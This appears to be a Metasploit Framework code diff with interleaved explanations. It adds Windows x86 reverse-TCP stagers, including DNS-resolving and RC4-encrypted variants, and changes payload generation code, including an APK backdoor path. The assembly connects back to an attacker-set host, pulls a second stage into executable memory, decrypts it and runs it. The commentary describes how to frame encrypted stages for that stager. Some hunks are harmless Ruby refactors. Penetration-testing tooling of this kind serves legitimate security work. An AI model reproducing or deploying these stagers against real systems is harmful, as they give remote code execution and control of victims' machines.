        push eax               ; push AF_INET
        push #{Rex::Text.block_api_hash('ws2_32.dll', 'WSASocketA')}
        call ebp               ; WSASocketA( AF_INET, SOCK_STREAM, 0, 0, 0, 0 );
        xchg edi, eax          ; save the socket for later, don't care about the value of eax after this

      create_socket:
        call got_hostname

      hostname:
        db "#{opts[:host]}", 0x00

      got_hostname:
        push #{Rex::Text.block_api_hash( "ws2_32.dll", "gethostbyname" )}
        call ebp               ; gethostbyname( "name" );

      set_address:
        mov eax, [eax+28]      ; names
        push #{retry_count}    ; retry counter
        push eax               ; host address
        push #{encoded_port}   ; family AF_INET and port number
        mov esi, esp           ; save pointer to sockaddr struct

      try_connect:
        push 16                ; length of the sockaddr struct
        push esi               ; pointer to the sockaddr struct
        push edi               ; the socket
        push #{Rex::Text.block_api_hash('ws2_32.dll', 'connect')}
        call ebp               ; connect( s, &sockaddr, 16 );

        test eax,eax           ; non-zero means a failure
        jz connected

      handle_connect_failure:
        ; decrement our attempt count and try again
        dec dword [esi+8]
        jnz try_connect
    ^

    if opts[:exitfunk]
      asm << %Q^
      failure:
        call exitfunk
      ^
    else
      asm << %Q^
      failure:
        push 0x56A2B5F0        ; hardcoded to exitprocess for size
        call ebp
      ^
    end

    asm << %Q^
      ; this label is required so that reconnect attempts include
      ; the UUID stuff if required.
      connected:
    ^

    asm << asm_send_uuid if include_send_uuid

    asm
  end

end

end
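Unlike the IP-based stager, the DNS variant carries LHOST as a null-terminated string inside the payload and resolves it at run time with gethostbyname. A small illustration of how that string ends up in the assembly via interpolation; example.com is a placeholder value:

    host = 'example.com'
    fragment = %Q^
      hostname:
        db "#{host}", 0x00
    ^
    puts fragment   # emits: db "example.com", 0x00 under the hostname: label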
@@ -0,0 +1,180 @@
# -*- coding: binary -*-

require 'msf/core'
require 'msf/core/payload/transport_config'
require 'msf/core/payload/windows/reverse_tcp'
require 'msf/core/payload/windows/rc4'

module Msf

###
#
# Complex reverse_tcp_rc4 payload generation for Windows ARCH_X86
#
###

module Payload::Windows::ReverseTcpRc4

  include Msf::Payload::TransportConfig
  include Msf::Payload::Windows::ReverseTcp
  include Msf::Payload::Windows::Rc4

  #
  # Generate the first stage
  #
  def generate
    xorkey, rc4key = rc4_keys(datastore['RC4PASSWORD'])
    conf = {
      port: datastore['LPORT'],
      host: datastore['LHOST'],
      retry_count: datastore['ReverseConnectRetries'],
      xorkey: xorkey,
      rc4key: rc4key,
      reliable: false
    }

    # Generate the advanced stager if we have space
    unless self.available_space.nil? || required_space > self.available_space
      conf[:exitfunk] = datastore['EXITFUNC']
      conf[:reliable] = true
    end

    generate_reverse_tcp_rc4(conf)
  end

  #
  # Generate and compile the stager
  #
  def generate_reverse_tcp_rc4(opts={})
    combined_asm = %Q^
      cld                    ; Clear the direction flag.
      call start             ; Call start, this pushes the address of 'api_call' onto the stack.
      #{asm_block_api}
      start:
        pop ebp
      #{asm_reverse_tcp(opts)}
      #{asm_block_recv_rc4(opts)}
    ^
    Metasm::Shellcode.assemble(Metasm::X86.new, combined_asm).encode_string
  end

  #
  # Generate an assembly stub with the configured feature set and options.
  #
  # @option opts [Fixnum] :port The port to connect to
  # @option opts [String] :exitfunk The exit method to use if there is an error, one of process, thread, or seh
  # @option opts [Bool] :reliable Whether or not to enable error handling code
  #
  def asm_block_recv_rc4(opts={})
    xorkey = Rex::Text.to_dword(opts[:xorkey]).chomp
    reliable = opts[:reliable]
    asm = %Q^
      recv:
        ; Receive the size of the incoming second stage...
        push 0                 ; flags
        push 4                 ; length = sizeof( DWORD );
        push esi               ; the 4 byte buffer on the stack to hold the second stage length
        push edi               ; the saved socket
        push #{Rex::Text.block_api_hash('ws2_32.dll', 'recv')}
        call ebp               ; recv( s, &dwLength, 4, 0 );
    ^

    if reliable
      asm << %Q^
        ; reliability: check to see if the recv worked, and reconnect
        ; if it fails
        cmp eax, 0
        jle cleanup_socket
      ^
    end

    asm << %Q^
        ; Alloc a RWX buffer for the second stage
        mov esi, [esi]         ; dereference the pointer to the second stage length
        xor esi, #{xorkey}     ; XOR the stage length
        lea ecx, [esi+0x100]   ; ECX = stage length + S-box length (alloc length)
        push 0x40              ; PAGE_EXECUTE_READWRITE
        push 0x1000            ; MEM_COMMIT
        ; push esi             ; push the newly received second stage length.
        push ecx               ; push the alloc length
        push 0                 ; NULL as we don't care where the allocation is.
        push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')}
        call ebp               ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
        ; Receive the second stage and execute it...
        ; xchg ebx, eax        ; ebx = our new memory address for the new stage + S-box
        lea ebx, [eax+0x100]   ; EBX = new stage address
        push ebx               ; push the address of the new stage so we can return into it
        push esi               ; push stage length
        push eax               ; push the address of the S-box
      read_more:               ;
        push 0                 ; flags
        push esi               ; length
        push ebx               ; the current address into our second stage's RWX buffer
        push edi               ; the saved socket
        push #{Rex::Text.block_api_hash('ws2_32.dll', 'recv')}
        call ebp               ; recv( s, buffer, length, 0 );
    ^

    if reliable
      asm << %Q^
        ; reliability: check to see if the recv worked, and reconnect
        ; if it fails
        cmp eax, 0
        jge read_successful

        ; something failed, free up memory
        pop eax                ; get the address of the payload
        push 0x4000            ; dwFreeType (MEM_DECOMMIT)
        push 0                 ; dwSize
        push eax               ; lpAddress
        push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualFree')}
        call ebp               ; VirtualFree(payload, 0, MEM_DECOMMIT)

      cleanup_socket:
        ; clear up the socket
        push edi               ; socket handle
        push #{Rex::Text.block_api_hash('ws2_32.dll', 'closesocket')}
        call ebp               ; closesocket(socket)

        ; restore the stack back to the connection retry count
        pop esi
        pop esi
        dec [esp]              ; decrement the counter

        ; try again
        jmp create_socket
      ^
    end

    asm << %Q^
      read_successful:
        add ebx, eax           ; buffer += bytes_received
        sub esi, eax           ; length -= bytes_received
        ; test esi, esi        ; test length
        jnz read_more          ; continue if we have more to read
        pop ebx                ; address of S-box
        pop ecx                ; stage length
        pop ebp                ; address of stage
        push ebp               ; push back so we can return into it
        push edi               ; save socket
        mov edi, ebx           ; address of S-box
        call after_key         ; Call after_key, this pushes the address of the key onto the stack.
        db #{raw_to_db(opts[:rc4key])}
      after_key:
        pop esi                ; ESI = RC4 key
        #{asm_decrypt_rc4}
        pop edi                ; restore socket
        ret                    ; return into the second stage
    ^

    if opts[:exitfunk]
      asm << asm_exitfunk(opts)
    end

    asm
  end

end

end
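On the wire this stub expects a 4-byte little-endian stage length XORed with the 4-byte xorkey, followed by the RC4-encrypted stage. A rough sketch of that framing from the sending side; xorkey and rc4key below are placeholder values of the right shape, the real derivation from RC4PASSWORD lives in rc4_keys, and RC4 availability depends on the local OpenSSL build:

    require 'openssl'

    # Encrypt a stage with RC4 and prepend its length masked with the
    # xorkey dword, matching what the assembly above undoes.
    def frame_stage(stage, xorkey, rc4key)
      cipher = OpenSSL::Cipher.new('rc4')
      cipher.encrypt
      cipher.key = rc4key
      encrypted = cipher.update(stage) + cipher.final

      masked_len = encrypted.length ^ xorkey.unpack('V').first
      [masked_len].pack('V') + encrypted
    end

    frame_stage("\xcc" * 16, 'XKEY', 'K' * 16)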
@@ -0,0 +1,64 @@
# -*- coding: binary -*-

require 'msf/core'
require 'msf/core/payload/transport_config'
require 'msf/core/payload/windows/reverse_tcp_rc4'
require 'msf/core/payload/windows/reverse_tcp_dns'

module Msf

###
#
# Complex reverse_tcp_rc4 payload generation for Windows ARCH_X86
#
###

module Payload::Windows::ReverseTcpRc4Dns

  include Msf::Payload::TransportConfig
  include Msf::Payload::Windows::ReverseTcpRc4
  include Msf::Payload::Windows::ReverseTcpDns

  #
  # Generate the first stage
  #
  def generate
    xorkey, rc4key = rc4_keys(datastore['RC4PASSWORD'])
    conf = {
      port: datastore['LPORT'],
      host: datastore['LHOST'],
      retry_count: datastore['ReverseConnectRetries'],
      xorkey: xorkey,
      rc4key: rc4key,
      reliable: false
    }

    # Generate the advanced stager if we have space
    unless self.available_space.nil? || required_space > self.available_space
      conf[:exitfunk] = datastore['EXITFUNC']
      conf[:reliable] = true
    end

    generate_reverse_tcp_rc4_dns(conf)
  end

  #
  # Generate and compile the stager
  #
  def generate_reverse_tcp_rc4_dns(opts={})
    combined_asm = %Q^
      cld                    ; Clear the direction flag.
      call start             ; Call start, this pushes the address of 'api_call' onto the stack.
      #{asm_block_api}
      start:
        pop ebp
      #{asm_reverse_tcp_dns(opts)}
      #{asm_block_recv_rc4(opts)}
    ^
    Metasm::Shellcode.assemble(Metasm::X86.new, combined_asm).encode_string
  end

end

end
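All three new stagers follow the same sizing pattern: start from a minimal, non-reliable configuration and only switch on the larger feature set when the exploit's space budget allows it. A standalone sketch of that decision; the byte counts and the EXITFUNC value are made-up examples, and available_space/required_space come from the framework:

    conf = { reliable: false }
    available_space = 400   # bytes the exploit can carry (example)
    required_space  = 350   # estimated size of the full-featured stager (example)

    unless available_space.nil? || required_space > available_space
      conf[:exitfunk] = 'thread'   # example EXITFUNC
      conf[:reliable] = true
    end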
@@ -55,7 +55,7 @@ module Payload::Windows::ReverseHttp_x64

    # add extended options if we do have enough space
    unless self.available_space.nil? || required_space > self.available_space
      conf[:url] = generate_uri
      conf[:url] = luri + generate_uri
      conf[:exitfunk] = datastore['EXITFUNC']
      conf[:ua] = datastore['MeterpreterUserAgent']
      conf[:proxy_host] = datastore['PayloadProxyHost']

@@ -65,7 +65,7 @@ module Payload::Windows::ReverseHttp_x64
      conf[:proxy_type] = datastore['PayloadProxyType']
    else
      # Otherwise default to small URIs
      conf[:url] = generate_small_uri
      conf[:url] = luri + generate_small_uri
    end

    generate_reverse_http(conf)
@@ -96,7 +96,8 @@ module Payload::Windows::ReverseHttp_x64

    # Choose a random URI length between 30 and 255 bytes
    if uri_req_len == 0
      uri_req_len = 30 + rand(256-30)
      uri_req_len = 30 + luri.length + rand(256 - (30 + luri.length))

    end

    if uri_req_len < 5
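The change makes the random length account for any configured LURI prefix, so the full request URI still fits the 30..255 byte window. A minimal sketch with a placeholder prefix:

    luri = '/prefix'   # example LURI value
    uri_req_len = 30 + luri.length + rand(256 - (30 + luri.length))
    # with a 7-byte prefix this always lands in 37..255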
@@ -9,6 +9,9 @@ module Msf
  class EncoderSpaceViolation < PayloadGeneratorError
  end

  class PayloadSpaceViolation < PayloadGeneratorError
  end

  class IncompatibleArch < PayloadGeneratorError
  end
@@ -284,20 +287,26 @@ module Msf
      payload_module = framework.payloads.create(payload)
      payload_module.datastore.merge!(datastore)
      case format
      when "raw", "jar"
        if payload_module.respond_to? :generate_jar
          payload_module.generate_jar.pack
        else
          payload_module.generate
        end
      when "war"
        if payload_module.respond_to? :generate_war
          payload_module.generate_war.pack
        else
          raise InvalidFormat, "#{payload} is not a Java payload"
        end
      when "raw", "jar"
        if payload_module.respond_to? :generate_jar
          payload_module.generate_jar.pack
        else
          raise InvalidFormat, "#{format} is not a valid format for Java payloads"
          payload_module.generate
        end
      when "war"
        if payload_module.respond_to? :generate_war
          payload_module.generate_war.pack
        else
          raise InvalidFormat, "#{payload} is not a Java payload"
        end
      when "axis2"
        if payload_module.respond_to? :generate_axis2
          payload_module.generate_axis2.pack
        else
          raise InvalidFormat, "#{payload} is not a Java payload"
        end
      else
        raise InvalidFormat, "#{format} is not a valid format for Java payloads"
      end
    end
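The reworked dispatch adds an axis2 branch and rejects unknown formats for Java payloads. An illustrative, stripped-down version of that logic outside the framework; FakeJavaPayload is a stand-in object, and the real branches additionally call .pack on the generated archive:

    FakeJavaPayload = Struct.new(:jar) do
      def generate_jar; jar; end
    end

    # Pick the generator that matches the requested format, falling back
    # to plain generate only for "raw"/"jar".
    def emit(payload_module, format)
      case format
      when 'raw', 'jar'
        payload_module.respond_to?(:generate_jar) ? payload_module.generate_jar : payload_module.generate
      when 'war'
        payload_module.respond_to?(:generate_war) ? payload_module.generate_war : (raise 'not a Java payload')
      when 'axis2'
        payload_module.respond_to?(:generate_axis2) ? payload_module.generate_axis2 : (raise 'not a Java payload')
      else
        raise "#{format} is not a valid format for Java payloads"
      end
    end

    puts emit(FakeJavaPayload.new('jar-bytes'), 'jar')   # => jar-bytes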
@@ -308,20 +317,27 @@ module Msf
      if platform == "java" or arch == "java" or payload.start_with? "java/"
        raw_payload = generate_java_payload
        cli_print "Payload size: #{raw_payload.length} bytes"
        raw_payload
        gen_payload = raw_payload
      elsif payload.start_with? "android/" and not template.blank?
        cli_print "Using APK template: #{template}"
        apk_backdoor = ::Msf::Payload::Apk::ApkBackdoor::new()
        raw_payload = apk_backdoor.backdoor_apk(template, generate_raw_payload)
        cli_print "Payload size: #{raw_payload.length} bytes"
        raw_payload
        gen_payload = raw_payload
      else
        raw_payload = generate_raw_payload
        raw_payload = add_shellcode(raw_payload)
        encoded_payload = encode_payload(raw_payload)
        encoded_payload = prepend_nops(encoded_payload)
        cli_print "Payload size: #{encoded_payload.length} bytes"
        format_payload(encoded_payload)
        gen_payload = format_payload(encoded_payload)
      end
      if gen_payload.nil?
        raise PayloadGeneratorError, 'The payload could not be generated, check options'
      elsif gen_payload.length > @space and not @smallest
        raise PayloadSpaceViolation, 'The payload exceeds the specified space'
      else
        gen_payload
      end
    end
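After generation the result is now captured in gen_payload and checked against the requested space before being returned. A sketch of that post-check in isolation; the sizes are invented and the plain raise stands in for the framework's PayloadSpaceViolation:

    gen_payload = "\x90" * 600   # stand-in for the formatted payload
    space       = 512            # example -s / space value
    smallest    = false          # example smallest-encoding flag

    if gen_payload.nil?
      raise 'The payload could not be generated, check options'
    elsif gen_payload.length > space && !smallest
      raise 'The payload exceeds the specified space'
    end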
@@ -53,7 +53,7 @@ class Msf::Post < Msf::Module
    mod
  end

  # This method returns the ID of the {Mdm::Session} that the post module
  # This method returns the ID of the Mdm::Session that the post module
  # is currently running against.
  #
  # @return [NilClass] if there is no database record for the session
@@ -136,6 +136,8 @@ module Msf::Post::File
    end
  end

  alias :exists? :exist?

  #
  # Writes a given string to a given local file
  #
@@ -143,7 +145,7 @@ module Msf::Post::File
  # @param data [String]
  # @return [void]
  def file_local_write(local_file_name, data)
    unless ::File.exists?(local_file_name)
    unless ::File.exist?(local_file_name)
      ::FileUtils.touch(local_file_name)
    end
@@ -160,7 +162,7 @@ module Msf::Post::File
  # @param local_file_name [String] Local file name
  # @return [String] Hex digest of file contents
  def file_local_digestmd5(local_file_name)
    if ::File.exists?(local_file_name)
    if ::File.exist?(local_file_name)
      require 'digest/md5'
      chksum = nil
      chksum = Digest::MD5.hexdigest(::File.open(local_file_name, "rb") { |f| f.read})
@@ -191,7 +193,7 @@ module Msf::Post::File
  # @param local_file_name [String] Local file name
  # @return [String] Hex digest of file contents
  def file_local_digestsha1(local_file_name)
    if ::File.exists?(local_file_name)
    if ::File.exist?(local_file_name)
      require 'digest/sha1'
      chksum = nil
      chksum = Digest::SHA1.hexdigest(::File.open(local_file_name, "rb") { |f| f.read})
@@ -222,7 +224,7 @@ module Msf::Post::File
  # @param local_file_name [String] Local file name
  # @return [String] Hex digest of file contents
  def file_local_digestsha2(local_file_name)
    if ::File.exists?(local_file_name)
    if ::File.exist?(local_file_name)
      require 'digest/sha2'
      chksum = nil
      chksum = Digest::SHA256.hexdigest(::File.open(local_file_name, "rb") { |f| f.read})
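These hunks all make the same swap: ::File.exists? is deprecated in current Ruby, so the local-file helpers now call ::File.exist? with unchanged behaviour. A tiny standalone illustration with a placeholder path:

    require 'fileutils'
    require 'digest/md5'

    path = '/tmp/example.txt'   # placeholder path
    ::FileUtils.touch(path) unless ::File.exist?(path)
    puts Digest::MD5.hexdigest(::File.open(path, 'rb') { |f| f.read })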
Some files were not shown because too many files have changed in this diff.